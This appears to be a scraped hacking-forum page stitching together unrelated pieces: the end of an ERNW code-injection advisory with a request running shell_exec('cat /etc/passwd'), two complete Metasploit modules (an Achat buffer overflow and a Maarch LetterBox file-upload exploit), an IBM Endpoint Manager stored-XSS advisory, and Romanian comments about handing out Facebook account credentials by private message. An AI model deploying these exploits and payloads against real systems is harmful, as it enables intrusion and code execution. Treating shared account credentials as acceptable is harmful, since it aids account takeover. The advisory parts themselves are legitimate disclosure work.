ultimatively to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands). Proof of Concept ================ Using the demo application from the git repository: Executing shell_exec('cat /etc/passwd') Request: POST /ajax_create_sql.dist.php HTTP/1.0 host: http://www.example.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 471 a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d ate Response: HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 02:12:33 GMT Server: Apache/2.2.22 (Debian) Content-Length: 530 Content-Type: text/html {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/ bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"} Solution ======== This functionality should generally be removed or replaced by a mapping/ whitelist approach and strict type filtering to prevent arbitrary code execution. Affected Versions ================= >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1) Timeline ======== 2015-01-12: Vulnerability found 2015-01-13: Developer informed 2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1) References ========== [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3] https://www.ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt Advisory-ID =========== BC-1501 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. - -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds= =tnwW -----END PGP SIGNATURE----- Source

Felicitari ba @Kronzy dupa 30 de minute de cautari ( noroc cu "tips-urile" de la tine ca altfel nu reuseam )

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By sending a crafted message to the default port 9256 it's possible to overwrites the SEH handler. Even when the exploit is reliable it depends of timing since there are two threads overflowing the stack in the same time. This module has been tested on Windows XP SP3 and Windows 7. }, 'Author' => [ 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CWE', '121'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'DisableNops' => true, 'Space' => 730, 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Platform' => 'win', 'Targets' => [ # Tested OK Windows XP SP3, Windows 7 # Not working on Windows Server 2003 [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 18 2014')) register_options( [ Opt::RPORT(9256) ], self.class) end def exploit connect_udp # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding # 55 PUSH EBP # ebp holds a close pointer to the payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # mov eax, ebp # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 05 00140011 ADD EAX,11001400 # adjusting eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 50 PUSH EAX # eax points to the start of the shellcode # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # padding # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # put ebp to eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more # 05 00140011 ADD EAX,11001400 # more adjusting # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end sent = udp_sock.put(sploit[i..i + 8192 - 1]) i += sent end disconnect_udp end end Source

Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details ======= Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction ============ IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details ============ Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] <select NAME="url"> [...] <option>http://"><script>alert(/XSS/)</script></option> </select> Proof of Concept ================ http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk ============= As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'uri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Maarch LetterBox 2.8 Unrestricted File Upload', 'Description' => %q{ This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of session and file validation in the file_to_index.php script. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' ], 'References' => [ ['CVE', '2015-1587'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Maarch LetterBox 2.8', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/']) ], self.class) end def letterbox_login_url normalize_uri(target_uri.path, 'login.php') end def letterbox_upload_url normalize_uri(target_uri.path, 'file_to_index.php') end def check res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url) if res.nil? || res.code != 200 return Msf::Exploit::CheckCode::Unknown elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"') return Msf::Exploit::CheckCode::Appears end Msf::Exploit::CheckCode::Safe end def generate_mime_message(payload, name) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) print_good("#{peer} - Response parsed successfully") print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source

Nu va inteleg de ce toti cu gura "Crypteaza pass / alta data crypteaza " ce cacat e asa mare lucru sa te duci pe Encrypt or Decrypt sensitive data using AES/DES/RCA encryptors. si aia e ( oricum iti zice in ce e cryptat ) Din moment ce e FREE STUFF e pentru toata lumea, si pentru tine care ai mai multe cunostiinte si pentru Dorel Prostu' , mai tineti-va gura si nu mai comentati aiurea doar pentru +1. Va credeti pe HF ma ?

154.33 eu nu-l folosesc de asta m-am gandit sa-i ajut pe cei care au nevoie de un cont!

Nu primesti absolut nimic. De ce? Nu trebuia sa postezi aici ci sa dai PM + ca nu indeplinesti cerintele.

@Cifre nu am primit nimic bro... Gata am primit!

A si spus omu sa taci daca nu ai nimic de spus... On:// Ai pm!

Perfecte conturile alea de facebook! Multam.

- Nu postati aici da si mie etc... PM! Ce parte din asta nu intelegi?! Done, ai PM! Off://Nu schimbati parola ca e degeaba... e contul meu!